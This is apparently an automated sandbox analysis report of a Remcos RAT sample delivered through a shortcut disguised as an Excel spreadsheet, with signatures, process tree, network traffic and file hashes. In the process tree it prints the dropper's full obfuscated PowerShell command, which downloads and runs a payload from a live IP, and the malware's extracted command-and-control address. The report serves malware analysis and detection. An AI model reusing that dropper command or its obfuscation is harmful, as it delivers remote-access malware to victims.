Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
148s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
07-09-2024 01:16
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240903-en
General
-
Target
rv_luti_2024_roku.xlsx.lnk
-
Size
32KB
-
MD5
bbcc000caf3fff5b3025da99cff2aa45
-
SHA1
89a89db57a5b286b16d8d0a82903a4f256584bb5
-
SHA256
3e5adec34d0e3567b3eed2c917eaac783ff3eb19c2a1154339ebd1b2497f1e24
-
SHA512
1eecf2183c2909e642904dc023256b8f1437a25d59c541afa53b6eff4c9f727ef1fcdc3a7507f94e5d75ba490263c5a0fa2be95a1cfc4734a07a874d4bba56e1
-
SSDEEP
48:88muavUQSSE1I3fxvUZ7sEmOxCCevUZ731EdCZFXuGdZTa7x:88y8EE1YfxHERxCVybuKQ
Malware Config
Extracted
remcos
stalagg
5.181.156.117:8576
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-5TL39W
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 4936 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 3776 scr_previw.exe 1824 scr_previw.exe -
Loads dropped DLL 2 IoCs
pid Process 3776 scr_previw.exe 1824 scr_previw.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1824 set thread context of 2848 1824 scr_previw.exe 102 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language scr_previw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language scr_previw.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3272 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4936 powershell.exe 4936 powershell.exe 3776 scr_previw.exe 1824 scr_previw.exe 1824 scr_previw.exe 2848 cmd.exe 2848 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1824 scr_previw.exe 2848 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4936 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3272 EXCEL.EXE 3272 EXCEL.EXE 3272 EXCEL.EXE 3272 EXCEL.EXE 3272 EXCEL.EXE 3272 EXCEL.EXE 3272 EXCEL.EXE 3272 EXCEL.EXE 3272 EXCEL.EXE 3272 EXCEL.EXE 3272 EXCEL.EXE 3272 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1700 wrote to memory of 4936 1700 cmd.exe 87 PID 1700 wrote to memory of 4936 1700 cmd.exe 87 PID 4936 wrote to memory of 3776 4936 powershell.exe 99 PID 4936 wrote to memory of 3776 4936 powershell.exe 99 PID 4936 wrote to memory of 3776 4936 powershell.exe 99 PID 4936 wrote to memory of 3272 4936 powershell.exe 100 PID 4936 wrote to memory of 3272 4936 powershell.exe 100 PID 4936 wrote to memory of 3272 4936 powershell.exe 100 PID 3776 wrote to memory of 1824 3776 scr_previw.exe 101 PID 3776 wrote to memory of 1824 3776 scr_previw.exe 101 PID 3776 wrote to memory of 1824 3776 scr_previw.exe 101 PID 1824 wrote to memory of 2848 1824 scr_previw.exe 102 PID 1824 wrote to memory of 2848 1824 scr_previw.exe 102 PID 1824 wrote to memory of 2848 1824 scr_previw.exe 102 PID 3272 wrote to memory of 4044 3272 EXCEL.EXE 107 PID 3272 wrote to memory of 4044 3272 EXCEL.EXE 107 PID 1824 wrote to memory of 2848 1824 scr_previw.exe 102 PID 2848 wrote to memory of 1320 2848 cmd.exe 110 PID 2848 wrote to memory of 1320 2848 cmd.exe 110 PID 2848 wrote to memory of 1320 2848 cmd.exe 110 PID 2848 wrote to memory of 1320 2848 cmd.exe 110 PID 2848 wrote to memory of 1320 2848 cmd.exe 110
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\rv_luti_2024_roku.xlsx.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo mDDkSKPeKSnmyhDKrRrfgmsmeF; echo anUGxZjKUCNgLKMBbyEjctOscTtBFAQROSENvflIdGfTRJUxVqfCL; echo ykxRyjMJeSrZAgkrYWGta; if (-not(Test-Path 'glorytoukraine.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/glorytoukraine.zip -OutFile glorytoukraine.zip}; echo EMNQacYrNXHyebrpmkIKUbKIwHYVxkqDyqbnvplWDcpbb; Expand-Archive -Path glorytoukraine.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/scr_previw.exe; echo XbwVjPDNPkbnuGZQfsRvcJknOPJXCFbqSFCKR; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/racs/rv_luti_2024_roku.xlsx -OutFile rv_luti_2024_roku.xlsx; echo zqCIRBDMssIzkDEUagHLMaYQOxVloBQv; s''t''a''rt rv_luti_2024_roku.xlsx2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"C:\Users\Admin\AppData\Roaming\SecurityCheck\scr_previw.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exeC:\Users\Admin\AppData\Roaming\SuperSync_test\scr_previw.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- System Location Discovery: System Language Discovery
PID:1320
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\rv_luti_2024_roku.xlsx"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122884⤵PID:4044
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:3008
Network
-
Remote address:5.181.156.117:80RequestGET /glorytoukraine.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: 5.181.156.117
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 28 Aug 2024 15:21:08 GMT
ETag: "2e931b-620bfe845e100"
Accept-Ranges: bytes
Content-Length: 3052315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/zip
-
Remote address:5.181.156.117:80RequestGET /racs/rv_luti_2024_roku.xlsx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: 5.181.156.117
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 24 Jul 2024 21:02:48 GMT
ETag: "8201-61e0499b8ee00"
Accept-Ranges: bytes
Content-Length: 33281
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
-
Remote address:8.8.8.8:53Request117.156.181.5.in-addr.arpaIN PTRResponse117.156.181.5.in-addr.arpaIN PTRno-rdns mivocloudcom
-
Remote address:8.8.8.8:53Request217.106.137.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request23.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request28.118.140.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request183.59.114.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request56.126.166.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request13.86.106.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request43.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestroaming.officeapps.live.comIN AResponseroaming.officeapps.live.comIN CNAMEprod.roaming1.live.com.akadns.netprod.roaming1.live.com.akadns.netIN CNAMEeur.roaming1.live.com.akadns.neteur.roaming1.live.com.akadns.netIN CNAMEweu-azsc-000.roaming.officeapps.live.comweu-azsc-000.roaming.officeapps.live.comIN CNAMEosiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.comosiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.comIN A52.109.89.19
-
Remote address:52.109.89.19:443RequestPOST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com
ResponseHTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_81
X-OfficeVersion: 16.0.18025.30575
X-OfficeCluster: weu-000.roaming.officeapps.live.com
X-CorrelationId: 10c3167c-5fa8-43a2-b5c3-bd87dc577041
X-Powered-By: ASP.NET
Date: Sat, 07 Sep 2024 01:18:11 GMT
Content-Length: 654
-
Remote address:8.8.8.8:53Request97.32.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.89.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request240.143.123.92.in-addr.arpaIN PTRResponse240.143.123.92.in-addr.arpaIN PTRa92-123-143-240deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request22.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request130.109.69.13.in-addr.arpaIN PTRResponse
-
67.4kB 3.2MB 1406 2278
HTTP Request
GET http://5.181.156.117/glorytoukraine.zipHTTP Response
200HTTP Request
GET http://5.181.156.117/racs/rv_luti_2024_roku.xlsxHTTP Response
200 -
1.7kB 7.7kB 11 10
HTTP Request
POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svcHTTP Response
200 -
1.9kB 1.2kB 10 10
-
72 B 107 B 1 1
DNS Request
117.156.181.5.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
217.106.137.52.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
23.159.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
28.118.140.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
183.59.114.20.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
228.249.119.40.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
56.126.166.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
13.86.106.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
43.229.111.52.in-addr.arpa
-
73 B 247 B 1 1
DNS Request
roaming.officeapps.live.com
DNS Response
52.109.89.19
-
71 B 145 B 1 1
DNS Request
97.32.109.52.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
19.89.109.52.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
240.143.123.92.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.160.190.20.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
130.109.69.13.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5914f7b7fca3ff7756b87850df76f06fc
SHA14a15cd5440581655fb64f4ae79510e1dcdf8caa9
SHA256d61a27f86dfc47b06ad3887d976fe90e5b1f9b438fa25701a4a2e5021b0aba97
SHA5127a7817f7bb3f0445bd9350ad0a6d44db7910a8e0640a1dacf95162d511097cf573ff076a0d118bcdd5b4400a90ac922933ccb7c5baa48efe38a74d1aa2b93d81
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
354B
MD56e2e415b1ffecd0ea0742a4e135d03ab
SHA1571da1a3d40675a314b1373eadbdcc439fb99e99
SHA25644d80996b6ba4f95430af2569b2c1763e18044d8d2fddbbcd0b7dcad611be647
SHA512c2508a721fb8d4b096326639da50834d093cd18254f1f13f0163846efc23c458fde3740c45c19ecd5a35b2d823f62077c11a878efc0148543c52f4f549c02a18
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize2KB
MD5eebb581ed27d3d4dc8163f6bd366b30b
SHA1d9f18637615c371b54f25ec7f2ebc9d3c3d2fa6e
SHA256d5b04157079d7aac198e8ed4e6ae37e689fcc58129fb4349897390271464d4b6
SHA5122ac6ce164d79e53395a1404326edbd4019b0f6448e555782ffeff398a842c5e5eb7f7fc6848398f7cfa3bc3ce5b07ddda670a46cbbe0c75d46eed874b5af98f7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5e623ae6fa6306ad3a1de71f7f0b73ea3
SHA1193077f845a08d18510509b690acd20054af810f
SHA25673410e4f554da3a0e83ab357bd336295f61f807be282ffb5d137250aa31309be
SHA51232db7b4ddaf644f87ee9a5fda322fea8d7a3ccb1fa02627d53d71dd9fad6efa5ebfa8a22b830a1f0712d7df059939f7edea1fe791214f06466be907b39e81a7e
-
Filesize
1.9MB
MD546e435aecb557fcb16ae2ea3b22ab7fd
SHA15290156599fd9575c4401c80949ad5672fe64da5
SHA25670e0b720bb461503acbd947a8355fb629d703b8d7f99ddfbb09a0c71886861da
SHA512621010aa44868062361c6dbb670f8664c370ddcb0afbb5835765470522c03bb5ac779e86236cfffdcf343cbc582f81beacd2a7108d78c90d4dfc4c38e7d23bb3
-
Filesize
1.0MB
MD5289d2d639e058b63ebe16bd8d543115d
SHA1969736e5f6a2c416f556e2f73358020573486afc
SHA256f21bf56c8d15824dc1cf4108725f73154b88a89ab23f00a7f8dbb2d2de8e2568
SHA5127adf83c9795d9705c4c1345422d17ad26b6d4f27a8242674f44b2d2a05080e532d9a64c43803164bf25c4e9eb5cac7a0d3789d71e9f34b46b5b9c6203fad65aa
-
Filesize
2.2MB
MD5d9530ecee42acccfd3871672a511bc9e
SHA189b4d2406f1294bd699ef231a4def5f495f12778
SHA25681e04f9a131534acc0e9de08718c062d3d74c80c7f168ec7e699cd4b2bd0f280
SHA512d5f048ea995affdf9893ec4c5ac5eb188b6714f5b6712e0b5a316702033421b145b8ee6a62d303eb4576bf8f57273ff35c5d675807563a31157136f79d8a9980
-
Filesize
80KB
MD5cae9827c507632c4a1980479c21a42a2
SHA1d9a1c5900a93066645bf8fb7c79dacf56f3eaa3e
SHA256efeec4c2f612130ec81f3796bba26471e14dcf97b0e22247b7c7f40ad2eba0cf
SHA512441fb631ed26bfe5b84c4fd267a43fbacc64e0adae0e90d0d8e11a248fa2ab47d43a54f1cc3903532943d158d87a2e236976830834545b0d13471731b6f61768
-
Filesize
32KB
MD521046015d5d9ef5e536ac7643b1ab365
SHA1f3bcd22d8e9b5ad1c2e17b42d5684421b2ddfb05
SHA2567a94cedcc9624dbe8eb4ad818fbaf2a53f9ca0fe2ff28b3000a597e034b520bd
SHA512d63030de97a378e9bb73ce53f589c75f1da9e6fb3998da02680a9396b75ebf6773119d61e5663c007379c85413a8d023e1df2323038314d357ac64bd770b9c9e